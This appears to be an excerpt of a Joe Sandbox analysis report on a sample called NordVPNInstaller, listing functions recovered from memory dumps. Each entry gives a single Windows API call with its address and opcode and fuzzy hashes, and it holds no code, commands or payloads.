API String ID: 2738559852-0
Opcode ID: 4758eae8cfc752c8f6d314e33d1fe2a50e91cbf9428c8296927b8ce54a3a791d
Instruction ID: 4688c5335ad7956b0a4c754e31690c428d598ac6ad41eeb5cdf107018a99832f
Opcode Fuzzy Hash: 4758eae8cfc752c8f6d314e33d1fe2a50e91cbf9428c8296927b8ce54a3a791d
Instruction Fuzzy Hash: AA11C176500200AFEB21DF51DC88FA6FBE8EF54324F08845AE9899FA51C374E548CBB1

Function 05DE40A1 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE4103

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4d655e84020b5bfc6c4a33f63748b054093ad5328c73c4c438b17ad2dba6dc41
Instruction ID: bd37b20adadab0f6020d539f362dd80fe5700a68132540252123e0c25014d8c0
Opcode Fuzzy Hash: 4d655e84020b5bfc6c4a33f63748b054093ad5328c73c4c438b17ad2dba6dc41
Instruction Fuzzy Hash: 1111E2755093809FDB11CF25DC85B52BFE8EF46320F0884AEEC85CB252D235E949CB61

Function 05DE3B2E Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE3B8A

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: fa6046c28289c8b62f7e56595102c35ee3d4fd8742921ae7989eadd503e00d1d
Instruction ID: 05025e528147f596dd35050ad3ea027e40def6b2e263308167a03e65d5505d6e
Opcode Fuzzy Hash: fa6046c28289c8b62f7e56595102c35ee3d4fd8742921ae7989eadd503e00d1d
Instruction Fuzzy Hash: 2811CEB5500200AFEB20DF55DD84FB6FBA8EF44324F08886AED499BA41D374E508CBB1

Function 05DE5523 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 05DE5588

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: e55f7a28227b4471a30f07f11b1f43eaa7877d5b2e0f9f21ebed49a931bb9e25
Instruction ID: 705a042813c8a0c828debbe09a9a4c790a2cdd8158534cc5413db68873949797
Opcode Fuzzy Hash: e55f7a28227b4471a30f07f11b1f43eaa7877d5b2e0f9f21ebed49a931bb9e25
Instruction Fuzzy Hash: 0A11D075409780AFDB228F15DC44B62FFB4EF46224F08848EED858B662D265A818DB62

Function 05DE1156 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE11AF

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 96579073e1e64e4dc9f81d1316387cca917ec5a89a2c44b4e658874f7965d3ad
Instruction ID: 382fca2c706a26a2880e948854d7047272b5653d07639d331a38d43d739a349a
Opcode Fuzzy Hash: 96579073e1e64e4dc9f81d1316387cca917ec5a89a2c44b4e658874f7965d3ad
Instruction Fuzzy Hash: 1511CE75600200AEEB20DF91CC84BAABBA8EF44324F18846AE9459BA41C374E548CBB5

Function 05DE571D Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05DE5788

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 090c423e8f815cca1daa3da69ead0d917d529ee09e8f347647002fc5ba5bb1e9
Instruction ID: a4bb4b5c8cf39bbce074af95390605ccddef908bdc440b28631a586cd303b80c
Opcode Fuzzy Hash: 090c423e8f815cca1daa3da69ead0d917d529ee09e8f347647002fc5ba5bb1e9
Instruction Fuzzy Hash: 9D115E754093C0AFDB128B25DC84B61BFB4EF47624F0984DFED858F663D265A848CB62

Function 05DE0DA2 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE0DF8

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 2cbca73102a11864b1a4b0196ecd744f3f59493bd2fbf38aa79489d35e9348d0
Instruction ID: 15792b20031625349eb41990906d0604036af28c5b8f7a28c382998eb54247be
Opcode Fuzzy Hash: 2cbca73102a11864b1a4b0196ecd744f3f59493bd2fbf38aa79489d35e9348d0
Instruction Fuzzy Hash: 3F11C675500204AFEB11DF15DC48BA6BB9CEF54724F08846AED449B642D374E548CBB1

Function 053DBAA0 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053DBACC

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58c8d3da9ed4cbe6216a791daf35512a4e1f27742d2d9eafb9549d64390804bb
Instruction ID: 95468d954ab6f988a3131114a4b5af05ea7364e4b8e3c1c89b86b472e6244862
Opcode Fuzzy Hash: 58c8d3da9ed4cbe6216a791daf35512a4e1f27742d2d9eafb9549d64390804bb
Instruction Fuzzy Hash: EF216F7580162ADFDB25CF10D858BAAF7B2BF84301F1684E5D509AB200C7796EC5CF90

Function 05DE2132 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2191

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 846b5dca2702a99667c5dce0387377b2b13fa5e3febbb22a5c2153e40bbcfbd1
Instruction ID: 705de54f4a31916b981bf884676595f6834c457e2e5b9d187c6821c1680170cb
Opcode Fuzzy Hash: 846b5dca2702a99667c5dce0387377b2b13fa5e3febbb22a5c2153e40bbcfbd1
Instruction Fuzzy Hash: 27110279500200AFEB218F02CC84FAAFBACEF04324F08845AEE454AA51C370E548CBB1

Function 05DE5AB8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 05DE5B25

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6a5015ce55bc0811b946887fa46242992431530dececc3615347c95c2bce0cec
Instruction ID: a0607e4faef724ab6b4452d8a68365d8658acc620da2571cc76d6901b22b72a5
Opcode Fuzzy Hash: 6a5015ce55bc0811b946887fa46242992431530dececc3615347c95c2bce0cec
Instruction Fuzzy Hash: BC117C754093C09FDB228F21D854A62FFF4EF47224F0C84CAEDC54B663D265A818CB62

Function 0104A8BC Relevance: 1.6, APIs: 1, Instructions: 56comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0104A918

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 04392954ebc4225413a0ef7b20eba712b58bbfa0dc00d1ac47c0357005a2356c
Instruction ID: 6fcd94f26240ea8bba2c3d1358a915403af611453271ecdbd4f66b70614a1571
Opcode Fuzzy Hash: 04392954ebc4225413a0ef7b20eba712b58bbfa0dc00d1ac47c0357005a2356c
Instruction Fuzzy Hash: DF116D755093C09FDB528F25DC98B92BFB4EF46220F0884DADDC58F253D275A909CBA2

Function 0104B452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0104B4BB

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8d1acac273fd97e3c2a0899e3b9c88523eb55f07fc547290701a9d02b957234d
Instruction ID: c54b2bf6e8e416a7805232a70fa49a16bf13f72bf317d94edcf6b3f96c00c150
Opcode Fuzzy Hash: 8d1acac273fd97e3c2a0899e3b9c88523eb55f07fc547290701a9d02b957234d
Instruction Fuzzy Hash: CF1125B5500200AFE7208B15DC85BA6FBA8DF44720F048099EE445A782D7B4E448CBB1

Function 05DE43F8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DE4461

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ef1d2164b2a24e9fe31d2ab0324e7f91e3f9e6e4ab3c4e4f984371422f3f8e24
Instruction ID: 17b0ebca1effec8b708d37e5445b2ac0b6cca8faef772aec89d43c5d910589b5
Opcode Fuzzy Hash: ef1d2164b2a24e9fe31d2ab0324e7f91e3f9e6e4ab3c4e4f984371422f3f8e24
Instruction Fuzzy Hash: B911BF75409380AFDB228F11DC44E62FFB4EF46320F0984DEED844B663D279A948CB62

Function 05DE3CCA Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05DE3D20

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 919241b83caa4ebaaad4f3ccbf22387058a5296a1a076080ce1ac81ef29785c0
Instruction ID: 8320d018fdf06a0ab09b0cb7b6b10e8700147687dc5069f5daa336987da7fc84
Opcode Fuzzy Hash: 919241b83caa4ebaaad4f3ccbf22387058a5296a1a076080ce1ac81ef29785c0
Instruction Fuzzy Hash: 04113A756042009FDB20DF55D884BA6FBE8EF14620F0888AADD49CB662D375E948CBA1

Function 05DE14F6 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE154F

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 5f3632e52e928bad53afa7848d80f8379de4c03eef99e1687a880a4339352eab
Instruction ID: 9555f940aa7b0cc1ac6898bb5986ad87ee1f197aefad51c0bfb83058e7b7d34f
Opcode Fuzzy Hash: 5f3632e52e928bad53afa7848d80f8379de4c03eef99e1687a880a4339352eab
Instruction Fuzzy Hash: 1D11E1B5600200AFEB209B46CC85FA6FBA8EF44324F18805BED464BA51D374E549CAB5

Function 0104A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0104A0D5

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 91ff200ba8d8c820b3b4bb3c1a78f35e0399992ae02faa24d57ea945eafdbef5
Instruction ID: 052db847bad174177baab76674c47545a05f2a8eea5c6bf39c23f57e424af23a
Opcode Fuzzy Hash: 91ff200ba8d8c820b3b4bb3c1a78f35e0399992ae02faa24d57ea945eafdbef5
Instruction Fuzzy Hash: FB11BF75509380AFDB22CF15DC84B52FFB4EF46220F0884DAED858B562C275A808CB62

Function 05DE3FFE Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE4046

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 0e37c0bddddb01a4723a0c79b58b2c018788e0f8e3689aa73145467f9efabee4
Instruction ID: 48a453fae8bc2f70f57466669d4d93b6fd4c250877a111c9bf93e78a76670d20
Opcode Fuzzy Hash: 0e37c0bddddb01a4723a0c79b58b2c018788e0f8e3689aa73145467f9efabee4
Instruction Fuzzy Hash: F3118EB6A002408FDB61DF25D885B66FBE8EF54220F0884BADD49CB642D634E844CAA1

Function 05DE1CBA Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1D10

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 3d0addb50d23397c5e54ce59584669adaa7fe64690855a0c2164ab826f718646
Instruction ID: 478133ec6bf3f590bc11768368dc08659d58a022f76e46e945de8301bf2db146
Opcode Fuzzy Hash: 3d0addb50d23397c5e54ce59584669adaa7fe64690855a0c2164ab826f718646
Instruction Fuzzy Hash: 54010475600600AEEB21DB42CC84FE6F7A8EF44324F08805AED048B741D374E448CAB1

Function 05DE3F3E Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE3F83

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 70dd1467f410ecbfdef01549d5fa46ad8ad7f1c5f29e9f20cb2c64239fa162dc
Instruction ID: 130de8aa6fb267637a62308b69632478b39da7db3f8d45b1d2c28c81b4d50818
Opcode Fuzzy Hash: 70dd1467f410ecbfdef01549d5fa46ad8ad7f1c5f29e9f20cb2c64239fa162dc
Instruction Fuzzy Hash: B21161756042009FDB50DF69D884B76FBE8EF45220F08C8ABED4ACB641D774E408CBA1

Function 0104BEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 0104BF0D

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9cbc1874701a62d37d18c1fcb5748182cd417e1362dde3ff73261d7598fcf7cb
Instruction ID: e4e3b10666562e3549b4903f8293ec59608f0acdf3ede3178fa70955bcf151fe
Opcode Fuzzy Hash: 9cbc1874701a62d37d18c1fcb5748182cd417e1362dde3ff73261d7598fcf7cb
Instruction Fuzzy Hash: D101D6B5500200AFE721CB06DC84BAAF7D8DF55724F08C0A6ED498B742D375E549CAB5

Function 05DE4362 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE43AD

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: e0f5d7e7d43b3e187219a68dc08ac729da34266c25ccd452e6df0c57fc00d028
Instruction ID: 702815eecf68422c1ee30463856c88747d28dd24b2912b1da3a1ae5f1f0face5
Opcode Fuzzy Hash: e0f5d7e7d43b3e187219a68dc08ac729da34266c25ccd452e6df0c57fc00d028
Instruction Fuzzy Hash: 6A11A1756042008FDF60EF15D884B66FBE8FF54220F08845ADD49CB646E375E808CB71

Function 05DE5DB6 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE5DF6

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c225acce8f1108b3063df47ba2e444bae9439dacf934ea7321a233d8d119bc91
Instruction ID: 9d6a33e44fe67ea631d0d14a5f2e375fda86edf85553ab2d69e958850203a3ad
Opcode Fuzzy Hash: c225acce8f1108b3063df47ba2e444bae9439dacf934ea7321a233d8d119bc91
Instruction Fuzzy Hash: 2611A1756002048FDB20DF15D884BAAFBE4EF04724F08C4AADD49CB655D334E404CBA1

Function 05DE2206 Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05DE2252

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: cac0236c9f5d4786267443f218a9d8326bfb99d57fc375d28c57b5e43de7657c
Instruction ID: dc4162ea498d3eca40295b48e9797ad2bee0d396d432ea53dc53324b31c8a12b
Opcode Fuzzy Hash: cac0236c9f5d4786267443f218a9d8326bfb99d57fc375d28c57b5e43de7657c
Instruction Fuzzy Hash: 4B118E795002409FDB20DF55D884B66FBE8FF58320F08C4AADD8A8B662D335E418CFA1

Function 05DE40C6 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE4103

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 15223e1502ec70963ab05509d7217ef75df523dea14cfe1034b430390c41270f
Instruction ID: b95d726cfc7e3a88054b6d19fbcb497ef4a9cc540983ed2df925c361ba2bd83d
Opcode Fuzzy Hash: 15223e1502ec70963ab05509d7217ef75df523dea14cfe1034b430390c41270f
Instruction Fuzzy Hash: BA019E75A012408FEF50DF25DC85B66FBE8EF55220F08C4AADD49CB746D275E448CBA1

Function 05DE27D2 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 05DE2822

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: f4e9ea8d54fedbafc8ec29b38bd71a4ff93178a9c23b8b536059026468bd3e10
Instruction ID: 438892aec50a878f5e64f570139e3863ca097811d7a671832b46f5d67c454a91
Opcode Fuzzy Hash: f4e9ea8d54fedbafc8ec29b38bd71a4ff93178a9c23b8b536059026468bd3e10
Instruction Fuzzy Hash: E3015E71A00200ABD310DF16DD45B66FBA8EB88B20F14855AED089BB41D635B955CBA5

Function 05DE136A Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E24,?,?), ref: 05DE13BA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 19229c39d591f6772af318c587913ba8eb1880c18bf9d54c28ec81ca9c78d8fe
Instruction ID: cc327c5616005aa32befb46d27ed8bc04910bd77e32ca6098f83f3f0c34babe7
Opcode Fuzzy Hash: 19229c39d591f6772af318c587913ba8eb1880c18bf9d54c28ec81ca9c78d8fe
Instruction Fuzzy Hash: B4019E71A00200ABD310DF16CD45B66FBA8EB88B20F14811AEC089BB41D731B955CBE1

Function 05DE3E96 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 05DE3EE6

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 9e48949a8c2c54fac008d524bf4ad8da1604b413c506f7ff78c3c59a2d460085
Instruction ID: 554979e72d954d74e37fe9b070f417a851835d295e908e1f131363d5c1702d8b
Opcode Fuzzy Hash: 9e48949a8c2c54fac008d524bf4ad8da1604b413c506f7ff78c3c59a2d460085
Instruction Fuzzy Hash: D9019E71A00200ABD310DF16CD45B66FBA8EB88B20F14811AED089BB41D731B955CBA1

Function 05DE4266 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE42A0

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d14b077af43147c068bf967bd1bc8f4edc42224f937b55c00b1ee0f62898804a
Instruction ID: 591cac6b20cc0257d156263fd13bee4081de8486ba4287dac48206f66c17b36a
Opcode Fuzzy Hash: d14b077af43147c068bf967bd1bc8f4edc42224f937b55c00b1ee0f62898804a
Instruction Fuzzy Hash: 44019E75A002448FDB50DF66D8857AABBD8EF45220F08C4ABDD49CF642D674E404CBA1

Function 05DE63FE Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05DE6449

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 7818b8a6f132354862fb7d56a26fcf615bb6d2ba405f6deada952043a0609baa
Instruction ID: 05e122599d1ac314921ee42fcd4dddd32e5955b89c120f9b12b5b16951d349f6
Opcode Fuzzy Hash: 7818b8a6f132354862fb7d56a26fcf615bb6d2ba405f6deada952043a0609baa
Instruction Fuzzy Hash: CE0180B55082009FDB60DE15E885B26FBE8FF24620F08809ADD4A8B752D374E408CBB2

Function 05DE2BFA Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05DE2C3E

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2bd041ffef2de27e10fdac10113ca8514f5023af5751e3c8deab6ef5a14cedb2
Instruction ID: 5f5d348bbf5cf37ac9ed22b8b408261eab00d1f6d3fe514f8e7a5b7d3c862cd8
Opcode Fuzzy Hash: 2bd041ffef2de27e10fdac10113ca8514f5023af5751e3c8deab6ef5a14cedb2
Instruction Fuzzy Hash: E401AD365002009FDB21CF55D844B66FBE5EF48320F08C89ADD899A611C375E418CFA1

Function 05DE589A Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05DE58D7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 7775b6c2c92403accab686449cb4c77b1564bf418b8fe84e99e8c148c7a34630
Instruction ID: 59f7a428a15eb9ff9b07c5203b4a1000349adc8f4ee000679a0e84ee6a8298d7
Opcode Fuzzy Hash: 7775b6c2c92403accab686449cb4c77b1564bf418b8fe84e99e8c148c7a34630
Instruction Fuzzy Hash: FF017175604204CFDB60DE16EC85B6AFBE8EF55624F08C09BDD458B752D674E808CBA2

Function 05DE554A Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 05DE5588

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 99ee6ebf1d923423ab4815973e6c727f797b5a513193f78bf3563e5253460702
Instruction ID: 43136fc5d527aa34588d2fac2759899491a3d58a99471a298bbb5a1b8f3fb942
Opcode Fuzzy Hash: 99ee6ebf1d923423ab4815973e6c727f797b5a513193f78bf3563e5253460702
